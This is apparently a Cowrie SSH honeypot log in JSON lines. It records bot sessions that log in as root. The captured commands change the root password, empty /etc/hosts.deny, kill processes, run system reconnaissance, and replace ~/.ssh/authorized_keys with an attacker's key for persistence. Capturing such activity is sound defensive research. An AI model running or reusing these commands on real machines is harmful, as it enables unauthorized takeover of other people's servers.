{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","size":2,"shasum":"3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3f1f9a5db692d999bb3d576b5e9956a242136e961ff3f52ba6202b1254ccdb99 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.297183Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:10.503493Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"echo \"root:fETnbn4t5LWV\"|chpasswd|bash","message":"CMD: echo \"root:fETnbn4t5LWV\"|chpasswd|bash","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.504474Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/58e66d3379dfc9a4539568dd1fb4d87bb902836dcced1a816162b53d747ea1cd","size":21,"shasum":"58e66d3379dfc9a4539568dd1fb4d87bb902836dcced1a816162b53d747ea1cd","duplicate":false,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/58e66d3379dfc9a4539568dd1fb4d87bb902836dcced1a816162b53d747ea1cd after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.596033Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:10.827144Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","message":"CMD: rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.827921Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","shasum":"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","destfile":"/etc/hosts.deny","message":"Saved redir contents with SHA-256 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b to var/lib/cowrie/downloads/01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.922113Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","size":0,"shasum":"a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a7aa36c3bdff392eb5f787dfa19a7cc8c6cd0b3e77316d5b63b2dc8def608f3a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:10.923000Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:11.160583Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","message":"CMD: cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.161092Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","size":35,"shasum":"95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/95df9ab820c0b94e87412330a566c7e47ceef0cfc297bbe2c51a198d1b017abe after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.253248Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:11.454347Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","message":"CMD: free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.455064Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","size":29,"shasum":"ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ab1fb68311b4d2a718123c07a514cfe211df2e9109eeecc6f6f953af961c763c after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.547152Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:11.824273Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"ls -lh $(which ls)","message":"CMD: ls -lh $(which ls)","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.824971Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"which ls","message":"CMD: which ls","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.825756Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","size":55,"shasum":"a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/a28dd0be4d71a20d853d1770a896f623b4558fd8f00a6e06cc489263029b66f0 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:11.917860Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:12.117985Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"crontab -l","message":"CMD: crontab -l","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.118687Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","size":20,"shasum":"f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f904275333aeac48d7df6cf53fe5fb9212c7d132a7d37253d2ab9321ba2690d8 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.209973Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:12.484519Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"w","message":"CMD: w","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.485229Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","size":197,"shasum":"50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/50e721e49c013f00c62cf59f2163542a9d8df02464efeb615d31051b0fddc326 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.576878Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:12.806463Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"uname -m","message":"CMD: uname -m","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.807203Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","size":7,"shasum":"ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/ea82fe82924bbdcd34f9642d3e79470eefa35f2308a6d85ad9cadf20051f1b2d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:12.899007Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:13.096261Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo | grep model | grep name | wc -l","message":"CMD: cat /proc/cpuinfo | grep model | grep name | wc -l","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.096918Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","size":2,"shasum":"64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/64426356ffcabc3671e5bd0acff75ec85278dc0d4ff5dac8cc07a9dc05a4c420 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.188818Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:13.458088Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"top","message":"CMD: top","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.458781Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","size":44,"shasum":"28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28720365c5e7476a011e4f43ac003ee5f16247a263b9d623aa85ed311d73bf39 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.550837Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:13.749383Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"uname","message":"CMD: uname","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.750113Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","size":6,"shasum":"5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/5c0be87ed7434d69005f8bbd84cad8ae6abfd49121b4aaeeb4c1f4a2e2987711 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:13.841863Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:14.108421Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.109086Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.204220Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:14.437282Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.437953Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.529246Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:14.730525Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"lscpu | grep Model","message":"CMD: lscpu | grep Model","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.731304Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","size":26,"shasum":"afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/afd0dd76c8d59e416fec286d040e83826448034f3e0fe636494e348f908ff851 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:14.823641Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:15.097159Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.command.input","input":"df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","message":"CMD: df -h | head -n 2 | awk 'FNR == 2 {print $2;}'","sensor":"my-vps","timestamp":"2025-09-08T20:34:15.097859Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","size":10,"shasum":"09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/09a3e612f8cad156005766467cf917c507aa88b3336043a76182a301b404545e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:15.190076Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.closed","duration":"18.3","message":"Connection lost after 18.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:15.191653Z","src_ip":"216.107.136.92","session":"005718da97c7"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":57778,"dst_ip":"1.2.3.4","dst_port":22,"session":"2522a6248268","protocol":"ssh","message":"New connection: 103.206.72.2:57778 (1.2.3.4:22) [session: 2522a6248268]","sensor":"my-vps","timestamp":"2025-09-08T20:34:23.008350Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:34:23.011911Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:34:23.187838Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.login.success","username":"root","password":"MoeClub.org","message":"login attempt [root/MoeClub.org] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:34:23.884202Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:24.289072Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:34:24.289752Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T20:34:24.290768Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:24.464473Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T20:34:24.830865Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T20:34:24.831547Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T20:34:25.009700Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:25.010600Z","src_ip":"103.206.72.2","session":"2522a6248268"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":57888,"dst_ip":"1.2.3.4","dst_port":22,"session":"9d9b307593d3","protocol":"ssh","message":"New connection: 103.206.72.2:57888 (1.2.3.4:22) [session: 9d9b307593d3]","sensor":"my-vps","timestamp":"2025-09-08T20:34:25.180380Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:34:25.181416Z","src_ip":"103.206.72.2","session":"9d9b307593d3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:34:25.353914Z","src_ip":"103.206.72.2","session":"9d9b307593d3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T20:34:26.046458Z","src_ip":"103.206.72.2","session":"9d9b307593d3"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:27.221604Z","src_ip":"103.206.72.2","session":"9d9b307593d3"}
{"eventid":"cowrie.session.connect","src_ip":"103.206.72.2","src_port":57890,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca3dec61279f","protocol":"ssh","message":"New connection: 103.206.72.2:57890 (1.2.3.4:22) [session: ca3dec61279f]","sensor":"my-vps","timestamp":"2025-09-08T20:34:27.391388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T20:34:27.393011Z","src_ip":"103.206.72.2","session":"ca3dec61279f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T20:34:27.565645Z","src_ip":"103.206.72.2","session":"ca3dec61279f"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T20:34:28.255019Z","src_ip":"103.206.72.2","session":"ca3dec61279f"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:28.430859Z","src_ip":"103.206.72.2","session":"ca3dec61279f"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T20:34:28.431820Z","src_ip":"103.206.72.2","session":"2522a6248268"}
